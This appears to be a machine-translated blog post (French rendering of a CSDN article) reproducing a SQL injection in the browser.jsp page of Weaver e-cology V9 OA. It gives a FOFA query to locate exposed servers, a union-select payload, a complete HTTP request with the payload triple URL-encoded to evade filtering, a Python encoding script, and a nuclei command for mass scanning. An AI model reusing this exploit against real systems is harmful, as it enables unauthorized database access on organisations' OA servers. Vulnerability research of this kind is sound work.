Récurrence de la vulnérabilité Vulnérabilité d'injection SQL de Panmicro OA E-Cology V9 browser.jsp

Récurrence de la vulnérabilité Vulnérabilité d'injection SQL de Panmicro OA E-Cology V9 browser.jsp

Description de la vulnérabilité

La plate-forme de bureau mobile de nouvelle génération de Panwei, e-cology, fournit non seulement une plate-forme de travail collaboratif intégrée, mais réalise également progressivement l'ensemble du processus d'organisation électronique, en modifiant la manière traditionnelle des documents papier et des signatures physiques. Il existe une vulnérabilité d'injection SQL dans le browser.jsp de la plateforme Panwei OA E-Cology, à travers laquelle un attaquant peut obtenir les permissions de la base de données du serveur.
insérez la description de l'image ici

Récurrence de la vulnérabilité

fofa:app="泛微-协同商务系统"

1. Utilisez POC pour afficher la version actuelle de la base de données et renvoyer le résultat


1.MSSQL命令:
a' union select 1,''+(SELECT @@VERSION)+'

2.POC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {
    
    {
    
    Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
DNT: 1
Connection: close
Cookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028a
Upgrade-Insecure-Requests: 1

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

insérez la description de l'image ici
2. Écrivez et utilisez un petit script crypté avec trois caractères d'URL complets, comme suit


1命令:
python Fanwei_e-cology9_decode_three.py

2.脚本
import os
def main():
    clearFlag = "y"
    while(1):
        if clearFlag == "y" or clearFlag == "Y":
            os.system("cls")
        clearFlag = ""
        string = input("请输入需要转换的字符串 :")
        type = input("(输入1:进行三次url全字符编码 ) :")
        while(type != "1"):
            type = input("操作类型输入错误(输入1:进行三次url全字符编码) :")
        if type == "1" :
            for i in range(3):
                string = encode(string)
            encode_string = string
            print("编码结果为:"+encode_string+"\n")

#编码
def encode(string):
    encode_string = ""
    for char in string:
        encode_char = hex(ord(char)).replace("0x","%")
        encode_string += encode_char
    return encode_string
main()

insérez la description de l'image ici
2. vérification des noyaux

nuclei.exe -t FanWeiOA_E-Cology9_browser_SQL.yaml -l subs.txt -stats

insérez la description de l'image ici

Je suppose que tu aimes

Origine blog.csdn.net/qq_50854662/article/details/129661544
conseillé
Classement